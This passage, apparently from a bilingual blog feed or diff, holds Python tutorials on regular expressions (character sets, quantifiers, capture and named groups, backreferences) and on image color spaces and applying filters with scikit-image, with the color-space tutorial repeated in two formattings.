'plants,', 'it', 'can', 'grow', 'at', 'a', 'speed', 'of', '10', 'meters', 'per', 'second,', 'the', 'team', 'reports', 'July', '19', 'in', 'Science', 'Robotics.', 'The', 'design', 'could', 'serve', 'as', 'a', 'model', 'for', 'building', 'robots', 'that', 'can', 'traverse', 'constrained', 'environments', 'This', 'isn’t', 'the', 'first', 'robot', 'to', 'take', 'inspiration', 'from', 'plants.', 'One', 'plantlike', 'predecessor', 'was', 'a', 'robot', 'modeled', 'on', 'roots.']
    1
    ' '.join(re.findall('\S+', string))
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    . the dot matches any character excerpt the newline. 点匹配除换行符以外的任何字符。

    1
    2
    3
    4
    5
    6
    7
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
    1
    re.search('.+', string).group()  # no new line
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
    1
    re.search('.+', string, flags = re.DOTALL).group()
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'

    Creating your own character sets

    [A-Z] '-' is a metacharacter when used in [] (custom character sets) '-'[](自定义字符集)中使用时是一个元字符

    1
    string = 'Hello, There, How, Are, You'
    1
    re.findall('[A-Z]', string)  # pulls out all capital letters 取出所有大写字母
    ['H', 'T', 'H', 'A', 'Y']
    1
    2
    3
    re.findall('[A-Z,]', string)
    # here we search for any capital letters or a comma
    # 这里我们搜索大写字母或逗号
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
    1
    2
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Z,.]', string) # 在这里 . 只是一个字符集而不是之前所讲的所有非换行符
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
    1
    2
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Za-z,\s.]', string) # 大写字母, 小写字母, 逗号, 非空白, 句点
    ['H', 'e', 'l', 'l', 'o', ',', ' ', 'T', 'h', 'e', 'r', 'e', ',', ' ', 'H', 'o', 'w', ',', ' ', 'A', 'r', 'e', ',', ' ', 'Y', 'o', 'u', '.', '.', '.']

    Quantifers with custom sets

    1
    import re
    • + 出现一次或更多
    • ? 出现 0 或 1 次
    • * 出现 0 次或更多
    • {} 自定义出现次数
    1
    string = 'HELLO, There, How, Are, You...'
    1
    re.search('[A-Z]+', string)
    <re.Match object; span=(0, 5), match='HELLO'>
    1
    re.findall('[A-Z]+', string)
    ['HELLO', 'T', 'H', 'A', 'Y']
    1
    re.findall('[A-Z]{2,}', string)  # 2 or more
    ['HELLO']
    1
    2
    3
    # one or more of 4 types of characters
    # 四种字符中的一种或多种
    re.search('[A-Za-z\s,]+', string).group()
    'HELLO, There, How, Are, You'
    1
    re.findall('[A-Z]?[a-z\s,]+', string)
    ['O, ', 'There, ', 'How, ', 'Are, ', 'You']
    1
    2
    3
    4
    # ^ is a metacharacter within brackets
    # ^是括号中的元字符
    # 表示相反
    re.search('[^A-Za-z\s,]+', string).group()
    '...'
    1
    re.findall('[^A-Z]+', string) # 匹配所有非大写字符
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']

    GROUPS

    • groups allow us to pull out sections of a match and store them
      • groups 允许我们提取匹配的部分并存储它们
    1
    2
    3
    # contrived example 举例
    import re
    string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
    1
    re.findall('[A-Za-z]+ \w+ \d+ \w+', string)
    ['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
    • the use of brackets denotes a group 使用括号表示一个组
      • () = metacharacter 元字符
    1
    re.findall('([A-Za-z]+) \w+ \d+ \w+', string) # to pull out just the names 只把名字取出来
    ['John', 'Susan', 'Mike']
    1
    re.findall('[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out animals 取出所有动物
    ['cats', 'dogs', 'fishes']
    1
    2
    3
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    # use original string to make sure matching is correct, then use groups to pull out the info you want
    # 使用原始字符串确保匹配是正确的,然后使用组拉出你想要的信息
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    1
    2
    # organize the data by data-types 按数据类型组织数据
    info = re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    1
    info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]

    Python3 zip() 函数

    • zip() 函数用于将可迭代的对象作为参数,将对象中对应的元素打包成一个个元组,然后返回由这些元组组成的对象,这样做的好处是节约了不少的内存。
    • 与 zip 相反,zip(*) 可理解为解压,返回二维矩阵式
    1
    list(zip(*info))  # organize your data by categories 按类别组织数据
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
    1
    2
    match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups 抽出三组
    match
    <re.Match object; span=(0, 15), match='John has 6 cats'>
    1
    match.group(0)
    'John has 6 cats'
    1
    match.groups()
    ('John', '6', 'cats')
    1
    match.group(1)
    'John'
    1
    match.group(2)
    '6'
    1
    match.group(3)
    'cats'
    1
    match.group(1, 3)  # multiple groups 多个组
    ('John', 'cats')
    1
    match.group(3, 2, 1, 1)  # change the order 改变顺序
    ('cats', '6', 'John', 'John')
    1
    match.span()
    (0, 15)
    1
    match.span(2)
    (9, 10)
    1
    match.span(3)
    (11, 15)
    1
    match.start(3)
    11
    1
    2
    3
    # find all has no group function
    # re.findall 没有 group 函数
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [101], in <cell line: 3>()      1 # find all has no group function      2 # re.findall 没有 group 函数----> 3 re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)AttributeError: 'list' object has no attribute 'group'
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    ('John', '6', 'cats')
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # 这也不好使
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [39], in <cell line: 1>()----> 1 re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)AttributeError: 'tuple' object has no attribute 'group'
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
    1
    data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # 组中组
    1
    data
    [('John has 6 cats', 'John', '6', 'cats'), ('Susan has 3 dogs', 'Susan', '3', 'dogs'), ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
    1
    2
    3
    # 你只能这么干
    for i in data:
    print(i[3])
    catsdogsfishes
    1
    2
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    next(it).groups()
    ('John', '6', 'cats')
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print (element.group(1, 3, 2)) # don't forget iterators exhaust
    ('John', 'cats', '6')('Susan', 'dogs', '3')('Mike', 'fishes', '8')
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.group())
    John has 6 catsSusan has 3 dogsMike has 8 fishes
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.groups())
    ('John', '6', 'cats')('Susan', '3', 'dogs')('Mike', '8', 'fishes')

    Naming Groups

    1
    import re
    1
    string = 'New York, New York 11369'
    • ([A-Za-z\s]+) 寄件地址
    • ([A-Za-z\s]+) 收件地址
    • (\d+) 邮编
    1
    match = re.search('([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
    1
    match.group(1), match.group(2), match.group(3), match.group(0)
    ('New York', ' New York ', '11369', 'New York, New York 11369')

    ?P< > to name a group-- group name inside the <>, followed by RE for group

    • (?P<City>)
    • (?P<State>)
    • (?P<ZipCode>)
    1
    pattern = re.compile('(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
    1
    match = re.search(pattern, string)
    1
    match.group('City'), match.group('State'), match.group('ZipCode')
    ('New York', ' New York ', '11369')
    1
    match.group(1)
    'New York'
    1
    match.groups()
    ('New York', ' New York ', '11369')
    1
    2
    3
    # Just incase you forget the names of the groups you used
    # 以防您忘记了您使用的组的名称
    match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}

    Quantifiers on groups

    • Using quantifiers on groups has some nuances, but very useful
      • 在组上使用量词有一些细微差别,但非常有用
    1
    import re
    1
    2
    string = 'abababababab'  # ab repeated many times
    re.search('(ab)+', string) #(ab)+ is many instances of one group repeated 同一组的许多实例重复出现
    <re.Match object; span=(0, 12), match='abababababab'>
    1
    2
    3
    string = 'abababababab'  # ab repeated many times 重复了很多次

    re.search('[ab]+', string) # this is different
    <re.Match object; span=(0, 12), match='abababababab'>
    • difference explained below
      • (ab) 表示 a 和 b
      • [ab] 表示 a 或 b
    1
    2
    string = 'abababbbbbbb'  # only partial fit to our new string 只有部分符合我们的新字符串
    re.search('(ab)+', string)
    <re.Match object; span=(0, 6), match='ababab'>
    1
    2
    string = 'abababbbbbbb'  # but this pattern fits perfectly 但这个模式完全吻合
    re.search('[ab]+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    1
    2
    string = 'abababbbbbbb'  # allows flexibility 允许的灵活性
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
    1
    2
    string = 'abababsssss'  # allows flexibility
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 11), match='abababsssss'>

    Nuances to be wary of

    需要注意的细微差别

    1
    # only one group not multiple groups 只有一个组而不是多个组
    1
    2
    3
    4
    5
    6
    string = 'abababababab' # original string
    match = re.search('(ab)+', string)

    match.group(1)
    # capturing only one group; value is overwritten each time
    # 只捕获一个群体; 值每次都会被覆盖
    'ab'
    1
    match.group(2) # no value 没有值
    ---------------------------------------------------------------------------IndexError                                Traceback (most recent call last)Input In [10], in <cell line: 1>()----> 1match.group(2)IndexError: no such group
    1
    match.groups()  # only one group, group just overwritten 只有一个组,组被覆盖了
    ('ab',)
    1
    match.group(0) # the full match, not related to groups 完全匹配,与组无关
    'abababababab'
    • Another simple example with two groups using quantifiers
      • 另一个使用量词的两个组的简单例子
    1
    string = 'ababababab'
    1
    2
    match = re.search ('(ab)+(ab)+', string)
    match
    <re.Match object; span=(0, 10), match='ababababab'>
    1
    match.groups()
    ('ab', 'ab')
    1
    match.span(2) # the first group is greedy
    (8, 10)
    • Only one group captured
      • 只捕获了一个群体
    1
    2
    3
    string = '123456789'

    match = re.search('(\d)+', string)
    1
    match
    <re.Match object; span=(0, 9), match='123456789'>
    1
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    ('9',)

    Quantifiers with groups within findall

    在 findall 中包含组的量词

    1
    2
    3
    4
    5
    string = '123456789'

    re.findall('(\d)+', string)
    # only pulls out group and last instance
    # 只取出组和最后一个实例
    ['9']
    1
    2
    3
    string = '1234 56789'
    re.findall('(\d)+', string)
    # Here we have two matches 匹配了两个
    ['4', '9']
    1
    2
    3
    re.findall('((\d)+)', string)[1][0] 
    # to find full match create a main group engulfing the smaller groups
    # 要找到完全匹配,创建一个主组,吞噬较小的组
    '56789'
    1
    2
    3
    # another example
    string = 'abbbbb ababababab'
    re.findall('(ab)+', string) # two instances
    ['ab', 'ab']
    1
    2
    string  = 'abbbbb ababababab'
    re.findall('((ab)+)', string) #full match
    [('ab', 'ab'), ('ababababab', 'ab')]

    Groups for word completion

    1
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
    <re.Match object; span=(0, 14), match='Happy Birthday'>
    1
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>
    1
    re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>

    Non-capture Groups

    1
    import re
    1
    2
    3
    4
    5
    # Here is one such example:
    import re

    string = '1234 56789'
    re.findall('(\d)+', string)
    ['4', '9']
    1
    re.search('(\d)+', string).groups()  #using search
    ('4',)

    捕获组(capturing group)是把多个字符当作一个单元对待的一种方式。通过把字符括在括号内创建捕获组。例如,正则表达式(dog)创建包含字母“d”、“o”和“g”的一个组。输入字符串和捕获组匹配的那一部分将被保存在内存中,以便以后通过反向引用再次使用。

    非捕获组就是输入字符串和捕获组匹配的那一部分将不被保存在内存中。

    • non-capture groups syntax
      • ?: The symbol above represents non-capture groups and looks slightly similar to the syntax for naming groups
        • 上面的符号表示非捕获组,看起来有点类似于命名组的语法
      • ?P don’t confuse the two please.
        • 请不要混淆这两者
    1
    # comparison 比较
    1
    re.findall('(\d)+', string)
    ['4', '9']
    1
    re.findall('(?:\d)+', string)  # with non capture group 非捕获组
    ['1234', '56789']
    • So the group is part of the pattern, but we don’t output the groups’ results
      • 所以 group 是模式的一部分,但我们不输出 group 的结果
    1
    2
    3
    re.findall('\d+', string)
    # when RE has no groups in findall, we output entire match
    # 当 RE 在 findall 中没有组时,我们输出整个匹配
    ['1234', '56789']
    1
    # Another example
    1
    string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,' 
    1
    2
    # We want to pull out all names whose ID has 123 within in
    # 我们要取出所有 ID 包含 123 的名字
    1
    re.findall('(?:123)+ = (\w+),', string)  # three instances
    ['Alex', 'Danny', 'Mike']
    1
    2
    # Another example
    string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
    1
    re.findall('(?:1\*){2,}\d+', string)
    ['1*1*1*1*22222', '1*1*3333']
    • Now, non-captured groups doesn’t just affect the findall method
    • it also affects the search and match methods
      • 现在,未捕获的组不仅影响 findall 方法——它还影响搜索和匹配方法

    BE CAREFUL WITH SYNTAX

    • ?: correct!
    • :? incorrect!
    1
    2
    3
    string = '1234 56789'
    match = re.search('(?:\d)+', string) # correct syntax
    print(match.groups())
    ()
    1
    2
    3
    string = '1234 56789'
    match = re.search('(:?\d)+', string) # :? incorrect syntax!!!!
    print(match.groups())
    ('4',)

    Summary:

    • when we capture groups we are either storing the value or outputting them.
      • 当我们捕获组时,我们要么存储值,要么输出值。

    Backreferences - Using captured groups inside other operations

    反向引用——在其他操作中使用捕获的组

    • backreferencing is making a refererence to the captured group within the same regular expression
      • 反向引用是在同一个正则表达式中引用捕获的组
    1
    # syntax and example
    1
    re.search(r'(\w+) \1','Merry Merry Christmas')  # Looking for repeated words 寻找重复的单词
    <re.Match object; span=(0, 11), match='Merry Merry'>
    1
    re.search(r'(\w+) \1','Merry Merry Christmas').groups()
    ('Merry',)

    \1 is just referencing the first group within the regular expression

    ‘\1’ 匹配的是 所获取的第 1 个()匹配的引用。例如,’(\d)\1’ 匹配两个连续数字字符。如 33aa 中的 33

    1
    # Another example
    1
    re.findall(r'(\w+)','Happy Happy Holidays. Merry Christmas Christmas')
    ['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']
    1
    re.findall(r'(\w+) \1','Happy Happy Holidays. Merry Christmas Christmas')   # Want to look for repeated words 想要寻找重复的单词
    ['Happy', 'Christmas']
    1
    # another example
    1
    re.findall(r'(\w+) \1','Merry Merry Christmas Christmas Merry Merry Christmas')
    ['Merry', 'Christmas', 'Merry']
    ]]>
    @@ -9327,7 +9327,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(44-45)-Color%20Spaces/ - 正文

    Tutorial 44 - A note about color spaces in python

    Color spaces

    Color spaces are a way to represent color information present in an image.

    3 popular color spaces are RGB, HSV and LAB.

    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

    RGB Color space

    Stores information as Red, Green and Blue channels.

    Additive color model.

    Both scikit-image and opencv read color images by default as RGB but, opencv stored color infromation as BGR.

    B, G, R = cv2.split(color_opencv)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(B, cmap='gray')
    ax2.title.set_text('B')

    ax3 = fig.add_subplot(223)
    ax3.imshow(G, cmap='gray')
    ax3.title.set_text('G')

    ax4 = fig.add_subplot(224)
    ax4.imshow(R, cmap='gray')
    ax4.title.set_text('R')

    png

    HSV

    HSV stores color image information as Hue, Saturation and Value.

    HSV separates luma, or the image intensity, from chroma or the color information.

    HSV 将亮度或图像强度从色度或颜色信息中分离出来。

    When to use HSV?

    For applications where you need to change only pixel intensites and not color information.

    适用于只需要更改像素强度而不需要更改颜色信息的应用程序。

    e.g. histogram equalization 直方图均衡化

    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
    H, S, V = cv2.split(hsv_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(H, cmap='gray')
    ax2.title.set_text('H')

    ax3 = fig.add_subplot(223)
    ax3.imshow(S, cmap='gray')
    ax3.title.set_text('S')

    ax4 = fig.add_subplot(224)
    ax4.imshow(V, cmap='gray')
    ax4.title.set_text('V')

    png

    LAB

    LAB expresses color as three values:

    • L - for the lightness (consider this as your grey scale image)

    • A - from green to red

    • B - from blue to yellow

    When to use LAB?

    Just like HSV, LAB can be used for applications where you need to change only pixel intensities and color information.

    就像 HSV 一样,LAB 可以用于只需要更改像素强度和颜色信息的应用程序。

    e.g. histogram equalization

    Either HSV or LAB can be used interchangeably for most image processing tasks.

    对于大多数图像处理任务,HSV 或 LAB 都可以互换使用。

    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
    L, A, B = cv2.split(lab_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(L, cmap='gray')
    ax2.title.set_text('L')

    ax3 = fig.add_subplot(223)
    ax3.imshow(A, cmap='gray')
    ax3.title.set_text('A')

    ax4 = fig.add_subplot(224)
    ax4.imshow(B, cmap='gray')
    ax4.title.set_text('B')

    png

    Tutorial 45 - Applying filters designed for grey scale to color images in python

    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
    from skimage import filters
    from skimage import io
    from matplotlib import pyplot as plt
    from skimage.color import rgb2gray
    • Fails on color images as it is a grey filter
    • May work with newest skimage, but not clear what is does.
    image = io.imread('images/monalisa.jpg')
    try_to_apply_sobel = filters.sobel(image)
    plt.imshow(try_to_apply_sobel)
    <matplotlib.image.AxesImage at 0x2c0eaaeab50>

    png

    Two ways to apply the filter on color images

    • Separate R, G and B channels and apply the filter to each channel and put the channel back together.

      • 分开 R, G 和 B 通道,对每个通道使用过滤器,然后把通道放回一起。
    • Convert RGB to HSV and then apply filter to V channel and put it back to HSV and convert to RGB.

      • 将 RGB 转换为 HSV,然后对 V 通道应用滤镜,将其放回 HSV 并转换为 RGB。

    Too many lines of code to do these tasks but with adapt_rgb decorator the task becomes easy.

    • 太多的代码行来完成这些任务,但使用 adapt_rgb 装饰器,任务变得容易。
    @adapt_rgb(each_channel)  # 修饰器
    def sobel_each(image):
    return filters.sobel(image)


    @adapt_rgb(hsv_value)
    def sobel_hsv(image):
    return filters.sobel(image)
    each_channel_image = sobel_each(image)
    hsv_value_image = sobel_hsv(image)
    plt.imshow(hsv_value_image)
    <matplotlib.image.AxesImage at 0x2c0eab5cb50>

    png

    import cv2


    @adapt_rgb(each_channel)
    def median_each(image, k):
    output_image = cv2.medianBlur(image, k)
    return output_image

    median_using_cv2 = median_each(image, 13)
    plt.imshow(median_using_cv2)
    <matplotlib.image.AxesImage at 0x2c0eb86fbb0>

    png

    from skimage import exposure


    @adapt_rgb(each_channel)
    def eq_each(image):
    output_image = exposure.equalize_hist(image)
    return (output_image)

    equ_RGB = eq_each(image)
    plt.imshow(equ_RGB)
    <matplotlib.image.AxesImage at 0x2c0ec1ef3d0>

    png

    @adapt_rgb(hsv_value)
    def eq_hsv(image):
    output_image = exposure.equalize_hist(image)
    return (output_image)

    equ_hsv = eq_hsv(image)
    plt.imshow(equ_hsv)
    <matplotlib.image.AxesImage at 0x2c0ed2423a0>

    png

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image)
    ax1.title.set_text('Input Image')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(equ_RGB)
    ax2.title.set_text('Equalized using RGB channels')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(equ_hsv)
    ax3.title.set_text('Equalized using v channel in hsv')

    plt.show()

    png

    ]]>
    + 正文

    Tutorial 44 - A note about color spaces in python

    Color spaces

    Color spaces are a way to represent color information present in an image.

    3 popular color spaces are RGB, HSV and LAB.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

    RGB Color space

    Stores information as Red, Green and Blue channels.

    Additive color model.

    Both scikit-image and opencv read color images by default as RGB but, opencv stored color infromation as BGR.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    B, G, R = cv2.split(color_opencv)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(B, cmap='gray')
    ax2.title.set_text('B')

    ax3 = fig.add_subplot(223)
    ax3.imshow(G, cmap='gray')
    ax3.title.set_text('G')

    ax4 = fig.add_subplot(224)
    ax4.imshow(R, cmap='gray')
    ax4.title.set_text('R')

    png

    HSV

    HSV stores color image information as Hue, Saturation and Value.

    HSV separates luma, or the image intensity, from chroma or the color information.

    HSV 将亮度或图像强度从色度或颜色信息中分离出来。

    When to use HSV?

    For applications where you need to change only pixel intensites and not color information.

    适用于只需要更改像素强度而不需要更改颜色信息的应用程序。

    e.g. histogram equalization 直方图均衡化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
    H, S, V = cv2.split(hsv_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(H, cmap='gray')
    ax2.title.set_text('H')

    ax3 = fig.add_subplot(223)
    ax3.imshow(S, cmap='gray')
    ax3.title.set_text('S')

    ax4 = fig.add_subplot(224)
    ax4.imshow(V, cmap='gray')
    ax4.title.set_text('V')

    png

    LAB

    LAB expresses color as three values:

    • L - for the lightness (consider this as your grey scale image)

    • A - from green to red

    • B - from blue to yellow

    When to use LAB?

    Just like HSV, LAB can be used for applications where you need to change only pixel intensities and color information.

    就像 HSV 一样,LAB 可以用于只需要更改像素强度和颜色信息的应用程序。

    e.g. histogram equalization

    Either HSV or LAB can be used interchangeably for most image processing tasks.

    对于大多数图像处理任务,HSV 或 LAB 都可以互换使用。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
    L, A, B = cv2.split(lab_image)

    fig = plt.figure(figsize=(6, 6))

    ax1 = fig.add_subplot(221)
    ax1.imshow(color_opencv)
    ax1.title.set_text('Original')

    ax2 = fig.add_subplot(222)
    ax2.imshow(L, cmap='gray')
    ax2.title.set_text('L')

    ax3 = fig.add_subplot(223)
    ax3.imshow(A, cmap='gray')
    ax3.title.set_text('A')

    ax4 = fig.add_subplot(224)
    ax4.imshow(B, cmap='gray')
    ax4.title.set_text('B')

    png

    Tutorial 45 - Applying filters designed for grey scale to color images in python

    1
    2
    3
    4
    5
    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
    from skimage import filters
    from skimage import io
    from matplotlib import pyplot as plt
    from skimage.color import rgb2gray
    • Fails on color images as it is a grey filter
    • May work with newest skimage, but not clear what is does.
    1
    2
    3
    image = io.imread('images/monalisa.jpg')
    try_to_apply_sobel = filters.sobel(image)
    plt.imshow(try_to_apply_sobel)
    <matplotlib.image.AxesImage at 0x2c0eaaeab50>

    png

    Two ways to apply the filter on color images

    • Separate R, G and B channels and apply the filter to each channel and put the channel back together.

      • 分开 R, G 和 B 通道,对每个通道使用过滤器,然后把通道放回一起。
    • Convert RGB to HSV and then apply filter to V channel and put it back to HSV and convert to RGB.

      • 将 RGB 转换为 HSV,然后对 V 通道应用滤镜,将其放回 HSV 并转换为 RGB。

    Too many lines of code to do these tasks but with adapt_rgb decorator the task becomes easy.

    • 太多的代码行来完成这些任务,但使用 adapt_rgb 装饰器,任务变得容易。
    1
    2
    3
    4
    5
    6
    7
    8
    @adapt_rgb(each_channel)  # 修饰器
    def sobel_each(image):
    return filters.sobel(image)


    @adapt_rgb(hsv_value)
    def sobel_hsv(image):
    return filters.sobel(image)
    1
    2
    3
    each_channel_image = sobel_each(image)
    hsv_value_image = sobel_hsv(image)
    plt.imshow(hsv_value_image)
    <matplotlib.image.AxesImage at 0x2c0eab5cb50>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2


    @adapt_rgb(each_channel)
    def median_each(image, k):
    output_image = cv2.medianBlur(image, k)
    return output_image

    median_using_cv2 = median_each(image, 13)
    plt.imshow(median_using_cv2)
    <matplotlib.image.AxesImage at 0x2c0eb86fbb0>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    from skimage import exposure


    @adapt_rgb(each_channel)
    def eq_each(image):
    output_image = exposure.equalize_hist(image)
    return (output_image)

    equ_RGB = eq_each(image)
    plt.imshow(equ_RGB)
    <matplotlib.image.AxesImage at 0x2c0ec1ef3d0>

    png

    1
    2
    3
    4
    5
    6
    7
    @adapt_rgb(hsv_value)
    def eq_hsv(image):
    output_image = exposure.equalize_hist(image)
    return (output_image)

    equ_hsv = eq_hsv(image)
    plt.imshow(equ_hsv)
    <matplotlib.image.AxesImage at 0x2c0ed2423a0>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image)
